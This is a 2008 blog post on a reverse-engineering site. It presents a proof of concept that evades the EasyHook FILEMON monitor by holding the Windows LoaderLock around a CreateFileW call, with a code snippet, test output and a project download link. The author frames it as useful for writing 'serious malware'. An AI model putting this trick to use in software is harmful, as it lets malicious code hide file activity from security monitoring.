About Articles Book Store Distributed RCE Downloads Event Calendar Forums Live Discussion Reference Library RSS Feeds Search Store Users What's New


Customize Theme

Flag: Tornado! Hurricane!

Blogs >> Dreg's Blog

Created: Sunday, December 14 2008 18:52.37 CST  
Printer Friendly ...
Bypassing windows hook engines which if the LoaderLock is held not executes the
Author: Dreg # Views: 3188

This project bypass windows hook engines which if the LoaderLock is held not executes the hook handler.

This project include the bypass of the easy-hook FILEMON.

This POC try creates with CreateFileW two files:
- no_bypass_hook.txt: which is logged by the FILEMON of the easy-hook
- bypass_hook.txt: which bypass the FILEMON of the easy-hook
-
- The bypass method is held the LoaderLock:
-. RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
-. CreateFile( ByPassFile.txt );
-. RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
- This works, because TDB of easy-hook uses the Auxiliary Windows Library
   before call the hook handler, if AuxUlibIsDLLSynchronizationHeld
   return TRUE, easy-hook not execute hook handler
- Helding the LoaderLock AuxUlibIsDLLSynchronizationHeld returns always TRUE

The code to bypass the easy-hook FILEMON hook handler is very simple:


RtlEnterCriticalSection( NtCurrentTeb()->Peb->LoaderLock );
CreateFileW
(
FILE_BYPASS_HOOK,
0,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL
);
RtlLeaveCriticalSection( NtCurrentTeb()->Peb->LoaderLock );


Then the FILE_BYPASS_HOOK never showed in easy-hook FILEMON Log.

Test the code is very simple, only runs bypass_easyhook.exe which creates two files each two seconds:


0-
CreateFileW(bypass_hook.txt) <- This CALL BYPASS easy-hook

CreateFileW(no_bypass_hook.txt) <- This CALL NOT BYPASS easy-hook
...


Next, run the FILEMON with the PID of bypass_easyhook.exe.

(Run the filemon from the path of FILEMON):

C:\bypass_easyhook\Release>FileMon.exe 2628
...

Number of assemblies processed = 3
Number of assemblies installed = 3
Number of failures = 0

FileMon has been installed in target 2628.

[2628:2772]: "no_bypass_hook.txt"
[2628:2772]: "no_bypass_hook.txt"

Only logged no_bypass_hook.txt, and the FILEMON never logged the CreateFileW of bypass_hook.txt :-).

Bypass windows hook engines which if the LoaderLock is held not executes the hook handler, is very simple with this trick.

But you want code a serious malware or program, held the LoaderLock only in safe situations. It is very important to avoid deadlocks.

The project: http://www.fr33project.org/projects/bypass_easyhook.rar




Add New Comment
Comment:









Active in Last 5 Minutes
unlarborn
pyro

There are 16,613 total registered users.


Recently Created Topics
how to crate a PATC...
Mar/10
wsnpoem audio.dll
Mar/09
suggestions - RE tra...
Mar/09
Requesting Suggestio...
Mar/06
Force enable debug p...
Mar/05
upgrading new image ...
Mar/03
upgrading new image ...
Mar/03
upgrading new image ...
Mar/03
Can some one give me...
Mar/02
Error in generating ...
Feb/28


Recent Forum Posts
suggestions - RE tra...
enm16
wsnpoem audio.dll
zhane
suggestions - RE tra...
Silkut
how to crate a PATC...
Silkut
suggestions - RE tra...
RolfRolles
wsnpoem audio.dll
debbie
Requesting Suggestio...
secursig
Requesting Suggestio...
phn1x
how to get executabl...
RabidCi...
how to get executabl...
RabidCi...


Recent Blog Entries
RolfRolles
Mar/08
Compiler Optimizations for ...
ReWolf
Mar/04
When memory management goes...
thesprawler
Feb/20
log1949.txt -- Wondering ho...
thesprawler
Feb/20
log1949.log -- created on C...
thesprawler
Feb/17
Trying to reverse the firmw...
More ...


Recent Blog Comments
Boken on:
Mar/12
Compiler Optimizations for ...
wildinto on:
Mar/10
Compiler Optimizations for ...
Orr on:
Mar/10
Compiler Optimizations for ...
bughoho on:
Mar/09
Compiler Optimizations for ...
cliffwolf on:
Mar/08
Compiler Optimizations for ...
More ...


Imagery
SoySauce Blueprint
Jun 6, 2008

[+] expand

View Gallery (11) / Submit